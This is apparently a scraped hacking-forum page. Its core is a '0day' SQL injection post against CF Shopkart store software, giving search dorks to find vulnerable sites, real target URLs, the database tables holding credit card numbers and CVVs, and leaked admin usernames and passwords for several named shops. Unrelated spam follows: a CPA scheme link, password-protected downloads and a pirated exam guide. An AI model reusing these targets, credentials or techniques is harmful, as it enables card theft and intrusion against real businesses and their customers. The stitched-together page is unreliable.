Leaderboard

0Day Exploit 1 - Shopping Cart. # Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day # Date: 12/1/12 # Author: Srblche # Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/ # Version: v4.x.x - v5.x.x # Category:: Webapps # Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for" # Tested on: Windows 7 and Backtrack ## 18,600 results ## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE] Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29 In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/ This 0day was made for Srblche. --------------------- TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES TABLE [users] CONTAINS ADMIN INFO ADMIN PANEL LINK WILL ALWAYS BE AT [/admin] --------------------- MSACCESS HELP - [+] Table Names of CF ShopKart -- categories checkoutheader companyinfo contacts customerhistory discounts emaillist gallery gallerycats gallerycomments gallerynotes graphics help homepage imagecategories ipcountries links logins options order\_no orderdetails orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber pages products promos sales sellingareas sentmessages settings settings2 shippingsurcharges shippingtable1 shippingtable2 shippingtable3 shippingtable4 shippingtable5 shippingtypes shoppingcarts stats stats\_archive storeheader taxes temporders upsconfig users ---------------------------------->> UserID,UserName,Password,UserLevel wishlistitems wishlists -------------------------------------------------------------------------------- https://www.streetsourceleds.com/(secure)/admin//admin.cfm Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin Data Found: UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin CVV's in only some orders. -------------------------------------------------------------------------------- https://www.zijagear.com/shop/admin/admin.cfm admin:taylor12 (paypal shop, no cc's found unless setting changed in options to store cc details) -------------------------------------------------------------------------------- EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken= (About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin admin:taylor12 ============================================================= http://www.augersidekick.com Column Data: admin Data Found: username=admin Length of 'Column Data' is 10 Column Data: chrisnmarc Data Found: password=chrisnmarc

How I make 100$/week using YouTube and CPA http://www.mediafire.com/?1laa9414t6fn1y3

Download : SteamRP by Ubaroo.rar Pass: ags#%321

September 7, 2011 Product Description Get complete coverage of all the objectives included on the EC-Council's Certified Ethical Hacker Exam inside this comprehensive resource. Written by an IT security expert, this authoritative Guide covers the vendor-neutral CEH Exam in full detail. You'll find learning objectives at the beginning of each chapter, Exam tips, practice Exam questions, and in-depth explanations. Designed to help you pass the Exam with ease, this definitive volume also serves as an essential on-the-job reference COVERS ALL Exam TOPICS, INCLUDING Introduction to Ethical hacking Cryptography Reconnaissance and footprinting Network scanning Enumeration System hacking Evasion techniques Social engineering and physical security Hacking web servers and applications SQL injection Viruses, trojans, and other attacks Wireless hacking Penetration testing CEHv7.rar"]Download pass:@CanavaroxuM sursa